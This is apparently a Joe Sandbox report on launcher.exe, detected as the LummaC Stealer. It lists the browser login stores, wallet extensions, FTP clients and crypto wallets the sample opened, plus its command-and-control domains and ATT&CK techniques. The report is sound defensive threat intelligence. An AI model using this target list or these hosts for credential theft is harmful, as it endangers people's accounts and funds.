Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2139030669.000000000356D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: launcher.exe PID: 7104, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: launcher.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
launcher.exe	29%	ReversingLabs	Win32.Trojan.Generic
launcher.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://stingyerasjhru.click:443/apis	0%	Avira URL Cloud	safe
stingyerasjhru.click	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/apiSF1Bg=	0%	Avira URL Cloud	safe
https://stingyerasjhru.click:443/apidowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WS	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/api	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stingyerasjhru.click	104.21.58.80	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://stingyerasjhru.click/api	true	Avira URL Cloud: safe	unknown
prisonyfork.buzz	false		high
stingyerasjhru.click	true	Avira URL Cloud: safe	unknown
hummskitnj.buzz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click:443/apis	launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	launcher.exe	false		high
http://ocsp.entrust.net02	launcher.exe	false		high
http://www.entrust.net/rpa03	launcher.exe	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aia.entrust.net/ts1-chain256.cer01	launcher.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click:443/apidowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WS	launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apiSF1Bg=	launcher.exe, 00000003.00000003.2112556351.0000000003589000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2112215761.0000000003589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/p	launcher.exe, 00000003.00000002.3280068773.0000000003574000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2201777570.0000000003573000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824320926.0000000003573000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/	launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824320926.0000000003573000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824556748.000000000354C000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279932255.000000000354E000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/ts1ca.crl0	launcher.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	launcher.exe	false		high
https://www.entrust.net/rpa0	launcher.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.58.80	stingyerasjhru.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581495
Start date and time:	2024-12-27 22:30:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	launcher.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 58 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: launcher.exe

Simulations

Behavior and APIs

Time	Type	Description
16:30:57	API Interceptor	8x Sleep call for process: launcher.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.58.80	http://www.akagustos-kampanyasizlerle1.cloud/	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Leside-.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.2.114
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.2.114
	http://proxyium.com	Get hash	malicious	Unknown	Browse	104.21.80.92
	https://cbhc9.anguatiab.ru/RpweC/	Get hash	malicious	Unknown	Browse	1.1.1.1
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.148.171
	search.hta	Get hash	malicious	Unknown	Browse	172.67.153.170
	http://bitstampweb.0532tg.com	Get hash	malicious	Unknown	Browse	172.67.133.12
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	172.66.0.145

JA3 Fingerprints

